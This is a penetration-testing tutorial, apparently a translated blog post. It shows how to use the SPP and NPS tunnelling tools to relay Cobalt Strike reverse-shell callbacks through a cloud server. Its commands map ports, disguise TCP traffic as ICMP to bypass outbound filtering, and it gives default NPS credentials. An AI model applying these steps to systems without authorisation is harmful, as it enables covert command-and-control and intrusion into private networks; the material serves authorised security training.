Intranet Infiltration—Tunnel construction & SPP and NPS intranet penetration

1. Preamble

  In the previous article, the basic knowledge of tunnel construction and proxy forwarding has been introduced in detail, so I will not repeat them here, but directly demonstrate the remaining two tools, SPP and NPS.

2. SPP

  The specific use of SPP can be queried directly on github, the explanation is very detailed, here is just a brief demonstration.

  Supported protocols: TCP, UDP, UDP, ICMP, HTTP, KCP, Quic

  Supported types: Forward Proxy, Reverse Proxy, SOCKS5 Forward Proxy, SOCKS5 Reverse Proxy

  SPP Download: https://gitcode.com/esrrhs/spp?utm_source=csdn_github_accelerator&isLogin=1

2.1. SPP Proxy Communications

  The proxy communication here is the same working principle as the previous ones, using a reverse proxy, where the attack machine has no outbound IP, and the generated Trojan can not bounce back the shell, and at this time, the proxy method can be solved, prepare a cloud server, set the cloud server as the server, the attack machine is set as the client, connect the client with the server through a certain port, and then map a local port to a certain port of the server by setting up the reverse proxy of the SPP, when a Trojan accesses the port of the server, it is equivalent to accessing the port of the attack machine, and the attack machine only needs to listen to the local portto go live.

2.1.1. Server Configuration

  In this case, you need to prepare an ECS in advance and add execution permissions to the file.

chmod +x spp ##添加执行权限
./spp -type server -proto tcp -listen :8888 ##启动spp，并设置为服务端，通信协议为tcp，监控本地的8888端口。           

2.1.2. Client Configuration

  The main thing is that when a machine accesses port 7777 of the server, the server will forward the traffic to the local port 5555, which is equivalent to port 7777 accessing the server is accessing the local port 5555.

chmod +x spp ##添加执行权限
./spp -name "text" -type reverse_proxy_client -server 服务器IP地址:8888 -fromaddr :7777 -toaddr :5555 -proxyproto tcp ## 设置一个名字，连接服务器的IP地址及端口，将服务器的端口7777映射到本地的端口5555上，设置通信协议为tcp。           

2.1.3 .CS settings

  Here CS needs to set up two listeners, one for generating Trojans and one for receiving bounce shells.

2.1.3.1. Set the generated listener

  The IP address of the listener here should be set to the IP address of the server, and the port is just 7777, which is equivalent to the Trojan will access the 7777 side of the server after it is executed, and the previous setting is to forward the 7777 port information of the server to the local 5555.

2.1.3.2. Set the listener for the listener

  All you need to do is listen to the local IP address and port 5555.

2.1.4. Execution Effect

  You can see that it has been successfully launched.

2.2. SPP tunnel establishment

  The main reason is that the outbound TCP of the destination host is prohibited, but the ICMP protocol can communicate, so the TCP traffic on the destination host is disguised as ICMP through SPP and forwarded to the server.

2.2.1. Server Settings

  The listener needs to be set up here is the ICMP protocol.

./spp -type server -proto ricmp -listen 0.0.0.0 ##这里设置监听ICMP协议，全端口           

2.2.2. Client Configuration

  The client configuration here needs to be set on the target host, and the local TCP needs to be forwarded because the local TCP is disguised as ICMP.

spp -name “test” -type proxy_client -server 服务端IP -fromaddr :5555 -toaddr :6666 -proxyproto tcp -proto ricmp           

2.2.3 .CS settings

  Here CS needs to set up two listeners, one for generating Trojans and one for receiving bounce shells.

2.2.3.1. Set the generated listener

  In this case, we need to generate a local port 5555 because port 5555 is already set up on the client.

2.2.3.2. Set the listener for the listener

  Only port 6666 of the local IP address needs to be listened to.

2.2.4. Execution Effect

  Again, it was successfully launched here.

3. NPS

  NPS is a lightweight, high-performance, and powerful intranet penetration proxy server. Currently, TCP and UDP traffic forwarding are supported, and any TCP and UDP upper-layer protocols (access to intranet websites, local payment interface debugging, SSH access, remote desktop, intranet DNS resolution, etc.) are supported...... In addition, it also supports intranet HTTP proxy, intranet SOCKS5 proxy, P2P, etc., and has a powerful web management terminal.

  NPS Download: https://gitcode.com/ehang-io/nps?utm_source=csdn_github_accelerator&isLogin=1

3.1. NPS Principle

  The original principle of NPS is the same as that of SPP above, so I will not introduce it here.

3.2. NPS Installation

  Since the server side of NPS is different from the client, you need to be careful not to confuse when downloading, and at the same time, there will be a lot of ports or some configurations involved in the configuration file, the default situation does not need to be modified, it is best to use it directly, if you need to modify, please refer to the official documentation.

  Official Documentation: https://github.com/ehang-io/nps/blob/master/README_zh.md

nps默认配置文件使用了80，443，8080，8024端口
80与443端口为域名解析模式默认端口
8080为web管理访问端口
8024为网桥端口，用于客户端与服务器通信
默认账号密码：admin/123           

3.2.1. Server Configuration

  Download it here, unzip it, and then perform the installation.

./nps install
nps start ##启动nps
nps stop ##停止nps
nps restart ##重启nps           

3.2.1.1. Access the server

  ECS address: 8080, default account and password: admin/123

3.2.1.2. Establish a tunnel

  What is established here is a TCP tunnel, the client ID does not matter, just write one, the service port, is the port accessed by other users, simply put, the port on the server is forwarded to the client, and the destination port is forwarded to which port on the client.

3.2.1.3. Tunnel State

  You can see that the tunnel is currently offline.

3.2.2. Client Configuration

  In the same way, don't install the wrong client here, follow the client, don't install it as a server, the client here just needs to be decompressed and OK.

3.2.2.1. Modify the configuration file

  There is an npc.conf file under the conf folder, in which we modify only one place, that is, the address and port of the server, that is, the address and port of communication with the server, the others are default, of course, you can also choose to modify, but it is best to modify it according to the official document.

  I feel that there is no need to modify it here, because when you start it below, you also need to add the IP and port of the server.

server_addr=124.XXX.XXX.62:8024 ##设置服务端地址:端口默认8024
vkey=123 ##客户端密钥           

3.2.2.2. Start the client

  You can enter the command here, but it should be noted that this is a Linux client.

./npc -server=124.XX.XX.62:8024 -vkey=123 -type=tcp ##这里就是设置服务端IP与端口 设置的密钥 连接的协议类型。           

3.2.2.3. Tunnel Status

  Here you can check the status of the tunnel, and you can see that it has been successfully launched.

3.3 .CS settings

  Here CS needs to set up two listeners, one for generating Trojans and one for receiving bounce shells.

3.3.1. Set the generated listener

  The IP address of the listener here should be set to the IP address of the server, and the port is just 5656, which means that after the Trojan is executed, it will access the 5656 side of the server, and the previous setting is to forward the information of the 5656 port of the server to the local 6666.

3.3.2. Set the listener for the listener

  Here, you only need to listen to the local IP address and port 6666.

3.4. Execution Effects

  You can see that it has been successfully launched.

3.5. Summary

  There are many ways to use NPS, so I recommend checking out the official manual.